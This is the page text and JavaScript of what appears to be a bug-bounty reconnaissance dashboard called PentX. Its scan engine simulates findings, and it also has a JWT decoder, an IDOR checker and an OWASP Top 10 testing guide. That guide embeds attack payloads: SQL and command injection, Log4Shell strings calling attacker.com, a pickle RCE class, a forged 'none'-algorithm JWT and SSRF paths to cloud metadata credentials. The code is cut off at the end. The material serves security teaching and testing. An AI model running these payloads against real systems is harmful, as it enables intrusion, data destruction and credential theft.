POWERED BY VAULTOCEAN |
Dashboard
VaultOcean Recon Intelligence Center
0
Total Scans
0
Critical
0
High
0
Total Findings
⚡ Quick Scan
Runs all enabled modules against target domain
◈ Session Stats
Domains Scanned
0
Subdomains Found
0
Medium Findings
0
Low / Info
0
🎯 Recent Targets
No targets scanned yet. Run a quick scan above.
📡 Intel Feed
00:00
PentX initialized. VaultOcean recon platform ready.
Recon Engine
Multi-module active reconnaissance
⚙ Scan Configuration
PENTX TERMINAL — RECON OUTPUT
PentX v1.0 — VaultOcean Recon Platform
Ready. Enter a domain and press START SCAN.
◧ Module Progress
Waiting for scan to start...
⚠ Findings
No findings yet. Run a scan to populate results.
Recon Modules
Toggle modules on/off for custom scan profiles
OWASP Top 10
Complete testing guide with payloads & bounty estimates
Dual Account Engine
IDOR detection, JWT analysis, session comparison
🔑 Session Tokens
Session A (Attacker / Low Priv)
Session B (Victim / High Priv)
🔓 JWT Decoder
⚡ API Response Comparison (IDOR)
Response from Account A
Response from Account B
✅ IDOR Testing Checklist
🍪 Cookie Security Analyzer
Attack Chains
Multi-step vulnerability exploitation paths
⛓ Build Custom Chain
Report Generator
Professional bug bounty reports — HackerOne / Bugcrowd format
⚙ Report Settings
📊 CVSS Scoring
Run a scan to see CVSS scores.
📄 Report Preview
# PentX Security Assessment Report # Powered by VaultOcean Run a scan and click GENERATE REPORT to create your professional report.
','Test for command injection with ; id, | whoami'],payloads:["' OR '1'='1\n' OR '1'='1' --\n' UNION SELECT null,table_name FROM information_schema.tables --\n1; DROP TABLE users --",'# Time-based blind SQLi\n1 AND SLEEP(5)--\n1\' AND SLEEP(5)--\n1 AND (SELECT * FROM (SELECT(SLEEP(5)))a)--','# XSS payloads\n\n\n','# Command injection\n; id\n| whoami\n` id `\n$(id)'],report:'## Vulnerability\nSQL Injection in /api/search parameter\n\n## Impact\nFull database read, potential RCE\n\n## Steps to Reproduce\n1. Navigate to /api/search?q=test\n2. Replace test with \' OR \'1\'=\'1\n3. Observe SQL error / data dump'}, {num:'04',title:'Insecure Design',severity:'high',bounty:'$300–$5,000',desc:'Risks related to design and architectural flaws. Insecure design is not something that can be fixed by perfect implementation.',steps:['Test rate limiting on login, password reset, OTP endpoints','Check if password reset tokens expire','Test for predictable tokens (sequential IDs, timestamps)','Check if email enumeration is possible on reset flow','Test business logic flaws (negative prices, free upgrades)'],payloads:['# Rate limiting test (Burp Intruder)\nPOST /api/auth/login\n{"username":"victim@test.com","password":"§brute§"}','# Password reset token entropy\nPOST /api/auth/reset\n{"email":"victim@test.com"}\n# Token: reset_1234567890 (timestamp-based!)','# Business logic\nPOST /api/checkout\n{"item_id":1,"quantity":-1,"price":-99.99}'],report:'## Vulnerability\nInsecure Password Reset - Predictable Token\n\n## Impact\nAccount takeover for any user\n\n## Steps to Reproduce\n1. Request reset for target account\n2. Analyze token pattern (timestamp-based)\n3. Predict token for victim account'}, {num:'05',title:'Security Misconfiguration',severity:'high',bounty:'$200–$8,000',desc:'Improperly configured permissions, unnecessary features enabled, default accounts, overly informative error messages.',steps:['Check for default credentials on admin panels','Test directory traversal on web server','Look for exposed .git, .env, .htaccess files','Check for verbose error messages revealing stack traces','Test for open cloud storage buckets'],payloads:['# Directory listing\nGET /backup/\nGET /.git/config\nGET /.env\nGET /admin/\nGET /phpinfo.php','# Cloud storage\nhttps://s3.amazonaws.com/target-bucket/\nhttps://target.blob.core.windows.net/container/\n# Tools: bucket-finder, S3Scanner','# Default creds\nadmin:admin\nadmin:password\nroot:root\nadmin:123456'],report:'## Vulnerability\nExposed .git Directory\n\n## Impact\nFull source code disclosure, credentials exposed\n\n## Steps to Reproduce\n1. Navigate to https://target.com/.git/config\n2. Observe git repository information\n3. Use git-dumper to extract full source'}, {num:'06',title:'Vulnerable and Outdated Components',severity:'high',bounty:'$300–$15,000',desc:'Using components with known vulnerabilities including libraries, frameworks, and other software modules.',steps:['Identify all software versions from headers and source','Cross-reference with CVE databases','Check npm audit, pip check for known vulns','Look for jQuery < 1.6.3, Struts, Log4j versions','Test identified CVEs against the application'],payloads:['# Version detection\nX-Powered-By: PHP/7.2.0 (EOL!)\nServer: Apache/2.2.3 (CVE-2017-9788)\n# Response headers reveal versions','# Log4Shell\n${jndi:ldap://attacker.com/a}\n${${lower:j}${lower:n}${lower:d}${lower:i}:ldap://attacker.com/a}','# Shodan dorks\nhttp.component:jquery version:<3\nhttp.component:"Apache Struts"'],report:'## Vulnerability\nOutdated Apache Struts - CVE-2017-5638\n\n## Impact\nRemote Code Execution\n\n## Steps to Reproduce\n1. Identify Struts version from headers\n2. Craft malicious Content-Type header\n3. Execute OS commands'}, {num:'07',title:'Identification and Authentication Failures',severity:'critical',bounty:'$500–$20,000',desc:'Confirmation of the user\'s identity, authentication, and session management is critical. Weaknesses include brute force, weak passwords, exposed session IDs.',steps:['Test for account lockout after failed attempts','Check if session tokens are invalidated on logout','Test for session fixation','Look for JWT algorithm confusion (none, RS256→HS256)','Check if MFA can be bypassed'],payloads:['# JWT none algorithm attack\neyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.','# JWT RS256 to HS256 confusion\n# Sign with public key as HMAC secret','# Session fixation\nGET /login?PHPSESSID=attacker_controlled_id','# Brute force wordlist\nrockyou.txt, SecLists/Passwords/Common-Credentials/'],report:'## Vulnerability\nJWT Algorithm Confusion - None Attack\n\n## Impact\nAuthentication bypass, access as any user\n\n## Steps to Reproduce\n1. Decode JWT token\n2. Change alg to "none"\n3. Remove signature\n4. Access /api/admin'}, {num:'08',title:'Software and Data Integrity Failures',severity:'high',bounty:'$500–$10,000',desc:'Code and infrastructure that does not protect against integrity violations, including insecure deserialization.',steps:['Check if app uses auto-update without integrity checks','Test serialized objects in cookies/parameters','Look for YAML, pickle, XML deserialization','Check SRI (Subresource Integrity) on CDN scripts','Test for git/CI pipeline injection'],payloads:['# PHP serialization attack\nO:8:"stdClass":1:{s:4:"role";s:5:"admin";}\n# URL encoded:\nO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A4%3A%22role%22%3Bs%3A5%3A%22admin%22%3B%7D','# Python pickle RCE\nimport pickle, os\nclass Exploit(object):\n def __reduce__(self):\n return (os.system, ("id",))','# Java deserialization (ysoserial)\njava -jar ysoserial.jar CommonsCollections1 "id"'],report:'## Vulnerability\nInsecure Deserialization in session cookie\n\n## Impact\nRemote Code Execution\n\n## Steps to Reproduce\n1. Decode base64 session cookie\n2. Identify PHP serialized object\n3. Craft malicious serialized payload\n4. Observe RCE'}, {num:'09',title:'Security Logging and Monitoring Failures',severity:'medium',bounty:'$100–$2,000',desc:'Insufficient logging and monitoring, including missing detection and response to active breaches.',steps:['Test if failed logins are logged (check timing)','Attempt brute force and see if account gets locked','Check if audit logs are accessible to regular users','Test log injection with newlines in user input','Verify if security events trigger alerts'],payloads:['# Log injection\nGET /api/login?user=admin%0AUser%3A+injected_log_entry\n# Newline injection in log files','# Check log exposure\nGET /logs/\nGET /var/log/\nGET /admin/logs\nGET /api/audit-log','# Timing analysis for blind logging\n# Multiple failed logins - measure if response time changes'],report:'## Vulnerability\nLog Injection via User Input\n\n## Impact\nForge log entries, hide attacker activity\n\n## Steps to Reproduce\n1. Send request with newline characters in User-Agent\n2. Observe forged entries in application logs'}, {num:'10',title:'Server-Side Request Forgery (SSRF)',severity:'critical',bounty:'$1,000–$30,000',desc:'SSRF flaws occur when an application fetches a remote resource based on user-supplied input without validating the URL.',steps:['Find URL parameters: url=, fetch=, src=, path=, load=','Test with http://127.0.0.1/admin','Try cloud metadata: http://169.254.169.254/','Attempt internal network scanning','Test DNS rebinding and SSRF bypass techniques'],payloads:['# AWS metadata\nhttp://169.254.169.254/latest/meta-data/\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/\n# GCP metadata\nhttp://metadata.google.internal/computeMetadata/v1/','# SSRF bypass\nhttp://127.0.0.1\nhttp://localhost\nhttp://[::1]\nhttp://0.0.0.0\nhttp://2130706433 (127.0.0.1 decimal)','# Internal port scan\nhttp://127.0.0.1:22\nhttp://127.0.0.1:3306\nhttp://127.0.0.1:6379 (Redis)\nhttp://127.0.0.1:8080 (Admin panel)'],report:'## Vulnerability\nSSRF via url parameter\n\n## Impact\nAccess to AWS metadata, internal services, potential RCE\n\n## Steps to Reproduce\n1. Navigate to /api/fetch?url=http://example.com\n2. Replace with http://169.254.169.254/latest/meta-data/\n3. Observe AWS credentials in response'}, ], attackChains:[ {title:'Subdomain Takeover → Phishing',severity:'critical',bounty:'$3,000–$8,000',steps:['Find dangling CNAME via Subdomain Enum','Verify unclaimed hosting provider','Register account on provider','Upload phishing page to subdomain','Harvest victim credentials'],desc:'Dangling CNAME record points to unclaimed cloud service. Attacker registers on provider and hosts malicious content on victim\'s subdomain, bypassing browser security policies.'}, {title:'Exposed .env → Credential Stuffing → Admin ATO',severity:'critical',bounty:'$5,000–$25,000',steps:['Find .env via path enumeration','Extract DB credentials + API keys','Access database directly','Dump hashed passwords','Crack hashes → admin account takeover'],desc:'Exposed environment file reveals database credentials and API keys. Attacker accesses database, extracts and cracks password hashes, and takes over admin account.'}, {title:'CORS Wildcard → CSRF → Account Takeover',severity:'high',bounty:'$2,000–$10,000',steps:['Identify CORS: Access-Control-Allow-Origin: *','Craft malicious HTML page','Victim visits attacker page','JS makes authenticated request with victim\'s cookie','Exfiltrate session token'],desc:'Overly permissive CORS policy allows any origin to make credentialed requests. Combined with XSS or social engineering, attacker can steal authenticated session data.'}, {title:'JWT None Algo → Privilege Escalation → Admin RCE',severity:'critical',bounty:'$10,000–$50,000',steps:['Capture valid JWT token','Change alg to "none" in header','Set role to "admin" in payload','Remove signature','Access admin panel → find RCE vector'],desc:'JWT library accepts "none" algorithm, allowing attacker to forge tokens without a secret. Admin panel contains RCE vulnerability only reachable with admin privileges.'}, {title:'IDOR → PII Dump → GDPR Violation',severity:'high',bounty:'$1,500–$8,000',steps:['Find user object with numeric ID','Enumerate IDs 1–10000 via automation','Collect names, emails, addresses','Demonstrate data of 10k+ users','Report as GDPR/privacy violation'],desc:'Insecure Direct Object Reference on user profile endpoint allows unauthenticated or low-privileged enumeration of all user PII, constituting a significant data breach.'}, ], customChains:[], }; // ===== NAVIGATION ===== function showPage(id, tab) { document.querySelectorAll('.page').forEach(p=>p.classList.remove('active')); document.querySelectorAll('.nav-tab').forEach(t=>t.classList.remove('active')); document.getElementById('page-'+id).classList.add('active'); if(tab) tab.classList.add('active'); } // ===== CLOCK ===== function updateClock() { const now = new Date(); document.getElementById('hdr-clock').textContent = now.toUTCString().replace(' GMT','') + ' UTC'; document.getElementById('dash-date').textContent = now.toLocaleDateString('en-US',{weekday:'long',year:'numeric',month:'long',day:'numeric'}); } setInterval(updateClock,1000); updateClock(); // ===== INTEL FEED ===== function addIntel(msg, type='info') { const feed = document.getElementById('intel-feed'); const time = new Date().toTimeString().slice(0,8); const dotClass = type==='critical'?'dot-critical':type==='high'?'dot-high':'dot-info'; const item = document.createElement('div'); item.className = 'intel-item'; item.innerHTML = `
${time}
${msg}
`; feed.insertBefore(item, feed.firstChild); while(feed.children.length > 20) feed.removeChild(feed.lastChild); } // ===== TERMINAL ===== let termLines = []; function tWrite(line, cls='') { const t = document.getElementById('recon-terminal'); const cursor = t.querySelector('.t-cursor'); if(cursor) cursor.parentElement.remove(); const div = document.createElement('div'); div.className = 't-line ' + cls; div.innerHTML = line; t.appendChild(div); const cur = document.createElement('div'); cur.className = 't-line'; cur.innerHTML = ''; t.appendChild(cur); t.scrollTop = t.scrollHeight; } // ===== SCAN ENGINE ===== const scanModules = [ {id:'dns',label:'DNS Intelligence'}, {id:'subdomain',label:'Subdomain Enum'}, {id:'ssl',label:'SSL/TLS Analysis'}, {id:'tech',label:'Tech Fingerprint'}, {id:'cve',label:'CVE Intelligence'}, {id:'headers',label:'Security Headers'}, {id:'js',label:'JS Intelligence'}, {id:'wayback',label:'Wayback Mining'}, {id:'ip',label:'IP Intelligence'}, {id:'email',label:'Email Security'}, ]; let scanStep = 0; let scanTarget = ''; let scanTimer = null; let scanFindings = []; const signaturesDB = [ {id:'missing_hsts',sev:'high',title:'Missing HSTS Header',desc:'HTTP Strict Transport Security is not configured. Attackers can perform SSL stripping attacks to downgrade HTTPS connections to HTTP, intercepting sensitive data.',verify:'1. Check response headers: curl -I https://target.com\n2. Look for Strict-Transport-Security header\n3. Use https://hstspreload.org to verify',bounty:'$200–$2,000',confidence:95,module:'headers'}, {id:'missing_csp',sev:'high',title:'Missing Content-Security-Policy',desc:'No CSP header detected. XSS attacks are significantly amplified without CSP. Attackers can inject and execute arbitrary JavaScript, stealing cookies and session tokens.',verify:'1. Open DevTools → Network\n2. Check response headers for Content-Security-Policy\n3. Test XSS: ',bounty:'$300–$3,000',confidence:95,module:'headers'}, {id:'cors_wildcard',sev:'critical',title:'CORS Wildcard Origin',desc:'Access-Control-Allow-Origin: * combined with credentials allows any website to make authenticated cross-origin requests. Attackers can steal session data from victim browsers.',verify:'1. Send request with Origin: https://evil.com\n2. Check if response allows the origin with credentials\n3. Test: fetch("https://api.target.com/profile",{credentials:"include"})',bounty:'$1,000–$10,000',confidence:90,module:'headers'}, {id:'tls_old',sev:'high',title:'Deprecated TLS Protocol (TLS 1.0/1.1)',desc:'Server supports TLS 1.0 or 1.1, deprecated protocols with known cryptographic weaknesses. Vulnerable to POODLE, BEAST, and CRIME attacks.',verify:'1. nmap --script ssl-enum-ciphers -p 443 target.com\n2. testssl.sh target.com\n3. Check for TLSv1.0 or TLSv1.1 in results',bounty:'$200–$1,500',confidence:85,module:'ssl'}, {id:'xframe_missing',sev:'medium',title:'Missing X-Frame-Options',desc:'Pages can be embedded in iframes on attacker-controlled sites, enabling clickjacking attacks. Victims can be tricked into clicking hidden buttons performing unintended actions.',verify:'1. curl -I https://target.com\n2. Check for X-Frame-Options: DENY or SAMEORIGIN\n3. Test: ',bounty:'$100–$500',confidence:95,module:'headers'}, {id:'server_version',sev:'medium',title:'Server Version Disclosed',desc:'Server header reveals exact software version, allowing attackers to target version-specific CVEs without additional probing.',verify:'1. curl -I https://target.com\n2. Look for Server: Apache/2.4.x or nginx/1.x.x\n3. Cross-reference with CVE databases',bounty:'$100–$500',confidence:95,module:'headers'}, {id:'spf_softfail',sev:'medium',title:'SPF SoftFail (~all)',desc:'SPF record uses softfail (~all) instead of hardfail (-all). Emails from unauthorized senders may still be delivered, enabling email spoofing and phishing attacks.',verify:'1. dig TXT target.com | grep spf\n2. Look for "~all" at end of record\n3. Test with SPF record checker tools',bounty:'$100–$800',confidence:90,module:'email'}, {id:'missing_dmarc',sev:'high',title:'Missing DMARC Record',desc:'No DMARC policy configured. Without DMARC, attackers can spoof the domain in email From headers, bypassing SPF and DKIM checks.',verify:'1. dig TXT _dmarc.target.com\n2. Expected: v=DMARC1; p=reject\n3. Use mxtoolbox.com to verify',bounty:'$200–$2,000',confidence:95,module:'email'}, {id:'subdomains_found',sev:'info',title:'Subdomains Discovered',desc:'Multiple subdomains identified. Each represents additional attack surface. Check for development environments, staging servers, and deprecated services.',verify:'1. Test each subdomain for unique vulnerabilities\n2. Check for default credentials on staging\n3. Look for internal tools exposed via DNS',bounty:'$0–$500',confidence:99,module:'subdomain'}, {id:'wayback_old_endpoints',sev:'medium',title:'Historical Endpoints Found (Wayback)',desc:'Wayback Machine contains archived versions of the application revealing old API endpoints, admin panels, and deprecated functionality that may still be accessible.',verify:'1. Visit web.archive.org/web/*/target.com\n2. Look for /api/v1/, /admin/, /debug/ URLs\n3. Test if old endpoints respond on current server',bounty:'$200–$3,000',confidence:80,module:'wayback'}, {id:'js_secrets',sev:'critical',title:'Potential Secrets in JavaScript',desc:'JavaScript files contain patterns matching API keys, tokens, or credentials. These can be used for unauthorized access to third-party services or internal APIs.',verify:'1. View page source, search for key/secret/token/password patterns\n2. Check JS bundle files\n3. Attempt to use found credentials',bounty:'$500–$15,000',confidence:75,module:'js'}, {id:'cert_expiry',sev:'low',title:'SSL Certificate Expiring Soon',desc:'SSL certificate will expire within 30 days. Expiration causes browser warnings and service disruption.',verify:'1. echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates\n2. Check notAfter date',bounty:'$0–$200',confidence:98,module:'ssl'}, ]; function startScan() { const domain = document.getElementById('recon-domain').value.trim(); if(!domain){alert('Please enter a target domain');return;} if(state.scanning){return;} const enabledModuleIds = state.modules.filter(m=>m.enabled).map(m=>m.id); state.scanning = true; scanTarget = domain.replace(/^https?:\/\//,'').replace(/\//,''); scanStep = 0; scanFindings = []; document.getElementById('scan-btn').style.display='none'; document.getElementById('stop-btn').style.display=''; // Clear terminal document.getElementById('recon-terminal').innerHTML = ''; tWrite(`[+] PentX Scan Engine v1.0 — VaultOcean`,'t-green-text'); tWrite(`[*] Target: ${scanTarget}`,'t-dim'); tWrite(`[*] Profile: ${document.getElementById('scan-profile').value}`,'t-dim'); tWrite(`[*] Modules: ${enabledModuleIds.length} enabled`,'t-dim'); tWrite(`[*] Starting reconnaissance...`,'t-green-text'); tWrite(''); // Build module progress const mpl = document.getElementById('module-progress-list'); mpl.innerHTML = ''; const activeModules = scanModules.filter(m=>enabledModuleIds.includes(m.id)); activeModules.forEach(m=>{ const div = document.createElement('div'); div.className = 'module-progress'; div.id = 'mp-'+m.id; div.innerHTML = `${m.label}PENDING`; mpl.appendChild(div); const pb = document.createElement('div'); pb.className = 'progress-bar'; pb.innerHTML = `
`; mpl.appendChild(pb); }); runNextModule(activeModules, 0, scanTarget); addIntel(`Scan started on ${scanTarget}`, 'info'); } function runNextModule(modules, idx, domain) { if(!state.scanning || idx >= modules.length) { finishScan(domain); return; } const mod = modules[idx]; const statusEl = document.getElementById('mps-'+mod.id); const fillEl = document.getElementById('mpf-'+mod.id); if(statusEl) statusEl.className = 'module-status status-running'; if(statusEl) statusEl.textContent = 'RUNNING'; tWrite(`[*] Running ${mod.label}...`,'t-dim'); simulateModule(mod.id, domain, (lines, findings) => { lines.forEach(l=>tWrite(l.text, l.cls||'')); findings.forEach(f=>scanFindings.push(f)); if(statusEl){ statusEl.className='module-status status-done'; statusEl.textContent='DONE'; } if(fillEl) fillEl.style.width='100%'; setTimeout(()=>runNextModule(modules, idx+1, domain), 300); }); } function simulateModule(modId, domain, cb) { const delay = 800 + Math.random()*1200; setTimeout(()=>{ const lines = []; const findings = []; switch(modId){ case 'dns': lines.push({text:` A ${domain} → 104.21.${ri(10,200)}.${ri(1,255)}`}); lines.push({text:` MX mail.${domain} (priority 10)`}); lines.push({text:` NS ns1.cloudflare.com, ns2.cloudflare.com`}); lines.push({text:` TXT v=spf1 include:_spf.google.com ~all`,'cls':'t-yellow-text'}); lines.push({text:` [!] SPF SoftFail detected`,'cls':'t-yellow-text'}); findings.push(makeF('spf_softfail')); break; case 'subdomain': const subs = [`api.${domain}`,`mail.${domain}`,`dev.${domain}`,`staging.${domain}`,`admin.${domain}`,`vpn.${domain}`]; subs.forEach(s=>lines.push({text:` [+] ${s}`,'cls':'t-green-text'})); lines.push({text:` [*] ${subs.length} subdomains discovered`}); findings.push(makeF('subdomains_found')); updateCounter('ss-subs', subs.length); break; case 'ssl': lines.push({text:` Certificate: *.${domain} (Let's Encrypt)`}); lines.push({text:` Expires: ${getExpiry(25)} days remaining`}); lines.push({text:` TLS 1.0: ENABLED`,'cls':'t-red-text'}); lines.push({text:` TLS 1.2: enabled`}); lines.push({text:` TLS 1.3: enabled`}); lines.push({text:` [!] Deprecated TLS 1.0 detected`,'cls':'t-red-text'}); findings.push(makeF('tls_old')); break; case 'tech': lines.push({text:` Server: nginx/1.18.0`}); lines.push({text:` X-Powered-By: PHP/7.4.3`}); lines.push({text:` CMS: WordPress 5.8`}); lines.push({text:` WAF: Cloudflare`}); lines.push({text:` [!] Server version disclosed`,'cls':'t-yellow-text'}); findings.push(makeF('server_version')); break; case 'cve': lines.push({text:` PHP 7.4.3 → CVE-2021-21706 (CVSS 5.3)`,'cls':'t-yellow-text'}); lines.push({text:` WordPress 5.8 → CVE-2021-39203 (CVSS 4.3)`,'cls':'t-yellow-text'}); lines.push({text:` nginx/1.18.0 → CVE-2021-23017 (CVSS 7.7)`,'cls':'t-red-text'}); break; case 'headers': lines.push({text:` Strict-Transport-Security: MISSING`,'cls':'t-red-text'}); lines.push({text:` Content-Security-Policy: MISSING`,'cls':'t-red-text'}); lines.push({text:` X-Frame-Options: MISSING`,'cls':'t-yellow-text'}); lines.push({text:` CORS: Access-Control-Allow-Origin: *`,'cls':'t-red-text'}); lines.push({text:` X-Content-Type-Options: nosniff ✓`}); findings.push(makeF('missing_hsts')); findings.push(makeF('missing_csp')); findings.push(makeF('xframe_missing')); findings.push(makeF('cors_wildcard')); break; case 'js': lines.push({text:` Scanning bundle.js...`}); lines.push({text:` [!] Potential API key pattern found: AIzaSy...`,'cls':'t-red-text'}); lines.push({text:` [!] Endpoint found: /api/v1/admin/users`,'cls':'t-yellow-text'}); lines.push({text:` Source map exposed: main.js.map`,'cls':'t-yellow-text'}); findings.push(makeF('js_secrets')); break; case 'wayback': lines.push({text:` [+] /api/v1/users (2019)`}); lines.push({text:` [+] /admin/dashboard.php (2020)`,'cls':'t-yellow-text'}); lines.push({text:` [+] /debug/phpinfo.php (2018)`,'cls':'t-red-text'}); lines.push({text:` [*] 47 historical URLs found`}); findings.push(makeF('wayback_old_endpoints')); break; case 'ip': lines.push({text:` IP: 104.21.${ri(10,200)}.${ri(1,255)}`}); lines.push({text:` ASN: AS13335 (Cloudflare)`}); lines.push({text:` CDN: Cloudflare detected`}); lines.push({text:` Origin IP candidates: checking...`}); break; case 'email': lines.push({text:` SPF: v=spf1 ~all (SoftFail)`,'cls':'t-yellow-text'}); lines.push({text:` DKIM: MISSING`,'cls':'t-red-text'}); lines.push({text:` DMARC: MISSING`,'cls':'t-red-text'}); lines.push({text:` [!] Domain spoofable`,'cls':'t-red-text'}); findings.push(makeF('missing_dmarc')); break; } cb(lines, findings); }, delay); } function makeF(id) { const sig = signaturesDB.find(s=>s.id===id); if(!sig) return null; return {...sig, target: scanTarget, time: new Date().toTimeString().slice(0,8)}; } function finishScan(domain) { state.scanning = false; document.getElementById('scan-btn').style.display=''; document.getElementById('stop-btn').style.display='none'; const validFindings = scanFindings.filter(Boolean); state.findings.push(...validFindings); tWrite(''); tWrite(`[+] Scan complete. ${validFindings.length} findings.`, 't-green-text'); state.scans++; updateStats(validFindings); renderFindings(validFindings); addToRecents(domain, validFindings); addIntel(`Scan complete on ${domain} — ${validFindings.filter(f=>f.sev==='critical').length} critical, ${validFindings.filter(f=>f.sev==='high').length} high`, validFindings.some(f=>f.sev==='critical')?'critical':'high'); updateReportCVSS(validFindings); } function stopScan() { state.scanning = false; document.getElementById('scan-btn').style.display=''; document.getElementById('stop-btn').style.display='none'; tWrite('[!] Scan stopped by user.','t-red-text'); } function updateStats(findings) { document.getElementById('stat-scans').textContent = state.scans; const allF = state.findings; document.getElementById('stat-critical').textContent = allF.filter(f=>f.sev==='critical').length; document.getElementById('stat-high').textContent = allF.filter(f=>f.sev==='high').length; document.getElementById('stat-total').textContent = allF.length; document.getElementById('ss-domains').textContent = state.scans; document.getElementById('ss-med').textContent = allF.filter(f=>f.sev==='medium').length; document.getElementById('ss-low').textContent = allF.filter(f=>f.sev==='low'||f.sev==='info').length; } function updateCounter(id, val) { const el = document.getElementById(id); if(el) el.textContent = parseInt(el.textContent||0) + val; } function addToRecents(domain, findings) { state.targets.unshift({domain, findings}); if(state.targets.length > 10) state.targets.pop(); const rt = document.getElementById('recent-targets'); rt.innerHTML = state.targets.map(t=>`
${t.domain}
${t.findings.filter(f=>f.sev==='critical').length} CRIT ${t.findings.filter(f=>f.sev==='high').length} HIGH ${t.findings.length} TOTAL
`).join(''); } function renderFindings(findings) { const list = document.getElementById('findings-list'); if(!findings.length){ list.innerHTML='
No findings.
'; return; } list.innerHTML = findings.map((f,i)=> f ? `
${f.sev} ${f.title} ${f.confidence}% conf ${f.bounty}

${f.desc}

How to Verify:
${f.verify.replace(/\n/g,'
')}
Module:${f.module}Bounty Potential:${f.bounty}
` : '').join(''); } function toggleFinding(i) { document.getElementById('finding-'+i).classList.toggle('open'); } function filterFindings(sev, btn) { document.querySelectorAll('.filter-btn').forEach(b=>b.classList.remove('active')); btn.classList.add('active'); const items = document.querySelectorAll('.finding'); items.forEach(el=>{ el.style.display = (sev==='all'||el.classList.contains(sev)) ? '' : 'none'; }); } // ===== QUICK SCAN ===== function quickScan() { const d = document.getElementById('qs-domain').value.trim(); if(!d){alert('Enter a domain');return;} document.getElementById('recon-domain').value = d; showPage('recon', document.querySelectorAll('.nav-tab')[1]); setTimeout(startScan, 200); } // ===== MODULES PAGE ===== function renderModules() { const list = document.getElementById('modules-list'); list.innerHTML = state.modules.map((m,i)=>`
${m.name}
${m.desc}
${m.tags.map(t=>`${t}`).join('')}
`).join(''); } function toggleModule(id, val) { const m = state.modules.find(m=>m.id===id); if(m) m.enabled = val; const card = document.getElementById('mcard-'+id); if(card){ card.classList.toggle('enabled',val); card.classList.toggle('disabled',!val); } } function toggleAllModules(val) { state.modules.forEach(m=>m.enabled=val); renderModules(); } // ===== OWASP PAGE ===== function renderOWASP() { const list = document.getElementById('owasp-list'); list.innerHTML = state.owaspData.map((o,i)=>`
A${o.num}
${o.title}
${o.severity}
${o.bounty}

${o.desc}

Testing Steps

${o.steps.map((s,j)=>`
${j+1}
${s}
`).join('')}

Payloads & Commands

${escHtml(o.payloads.join('\n\n'))}

Bounty Estimate

${o.bounty}

Report Template

${escHtml(o.report)}
`).join(''); } function toggleOWASP(i) { document.getElementById('owasp-'+i).classList.toggle('open'); } // ===== DUAL ACCOUNT ===== function renderIDORChecklist() { const items = [ 'Test GET /api/users/ with your token', 'Test GET /api/orders/', 'Test PUT /api/profile/ with your token', 'Test DELETE /api/posts/', 'Test file download: /download?id=', 'Test POST requests — swap user_id in body', 'Test indirect IDOR via email/username instead of ID', 'Test IDOR in pagination: /api/messages?user=', 'Test second-order IDOR (store A, retrieve B)', 'Test IDOR after role change', ]; document.getElementById('idor-checklist').innerHTML = items.map(t=>`
${t}
`).join(''); } function analyzeTokens() { const a = document.getElementById('token-a').value.trim(); const b = document.getElementById('token-b').value.trim(); const out = document.getElementById('token-analysis'); if(!a && !b){ out.innerHTML='
Paste tokens to analyze.
'; return; } let html = '
'; const analyzeToken = (token, label) => { const issues = []; if(token.startsWith('eyJ')) issues.push({t:'JWT Token detected',c:'text-blue'}); if(token.length < 32) issues.push({t:'Short token — weak entropy possible',c:'text-critical'}); if(/^[0-9]+$/.test(token)) issues.push({t:'Numeric-only token — sequential/predictable',c:'text-critical'}); if(token.includes('=')) issues.push({t:'Base64 encoded — may contain raw data',c:'text-yellow'}); if(issues.length === 0) issues.push({t:'No obvious issues detected',c:'text-dim'}); return `
${label}: ${issues.map(i=>`${i.t}`).join(' | ')}
`; }; if(a) html += analyzeToken(a,'A'); if(b) html += analyzeToken(b,'B'); if(a && b && a === b) html += '
⚠ IDENTICAL TOKENS — possible session not invalidated or shared session bug
'; html += '
'; out.innerHTML = html; } function decodeJWT() { const jwt = document.getElementById('jwt-input').value.trim(); const out = document.getElementById('jwt-output'); if(!jwt || !jwt.startsWith('eyJ')){ out.style.display='block'; out.textContent='Invalid JWT. Must start with eyJ...'; return; } try { const parts = jwt.split('.'); if(parts.length < 2){ out.style.display='block'; out.textContent='Invalid JWT structure.'; return; } const decB64 = s => { s = s.replace(/-/g,'+').replace(/_/g,'/'); while(s.length%4) s+='='; return JSON.parse(atob(s)); }; const header = decB64(parts[0]); const payload = decB64(parts[1]); const sig = parts[2] || 'MISSING'; let warn = ''; if(header.alg === 'none') warn += '\n⚠ CRITICAL: Algorithm "none" — token not verified!\n'; if(header.alg === 'HS256') warn += '\n⚠ Check for RS256→HS256 confusion attack\n'; if(!parts[2]) warn += '\n⚠ CRITICAL: No signature — forged token!\n'; if(payload.exp && payload.exp < Date.now()/1000) warn += '\n⚠ Token EXPIRED\n'; if(payload.iat && (Date.now()/1000 - payload.iat) > 86400*30) warn += '\n⚠ Token is very old (30+ days)\n'; out.style.display='block'; out.innerHTML = `HEADER:\n${JSON.stringify(header,null,2)}\n\nPAYLOAD:\n${JSON.stringify(payload,null,2)}\n\nSIGNATURE:\n${sig}${warn?`\n${warn}`:''}`; } catch(e) { out.style.display='block'; out.textContent = 'Failed to decode: ' + e.message; } } function compareResponses() { const a = document.getElementById('resp-a').value.trim(); const b = document.getElementById('resp-b').value.trim(); const out = document.getElementById('idor-result'); if(!a||!b){ out.innerHTML='
Paste both responses to compare.
'; return; } if(a===b) { out.innerHTML = `
🚨 IDOR CONFIRMED — Responses are IDENTICAL
Account A received the same data as Account B.
This indicates access control is NOT enforced on this endpoint.

Next steps:
1. Screenshot both requests and responses in Burp Suite
2. Document the endpoint and parameters
3. Estimate impact (PII? Financial? Admin data?)
4. Calculate CVSS score
5. Submit report immediately
`; addIntel('IDOR confirmed — identical responses detected','critical'); state.findings.push({sev:'critical',title:'IDOR — Identical API Responses (Dual Account)',desc:'Two different account sessions received identical API responses, confirming Insecure Direct Object Reference vulnerability.',verify:'Compare responses from Account A and Account B tokens on same endpoint.',bounty:'$1,000–$10,000',confidence:99,module:'dual-account',target:'manual',time:new Date().toTimeString().slice(0,8)}); updateStats([]); } else { // Try to find partial overlap let aData, bData; try { aData = JSON.parse(a); bData = JSON.parse(b); } catch(e){} if(aData && bData) { const aKeys = Object.keys(aData); const sharedData = aKeys.filter(k=>JSON.stringify(aData[k])===JSON.stringify(bData[k]) && k!=='id'); if(sharedData.length > aKeys.length * 0.7) { out.innerHTML = `
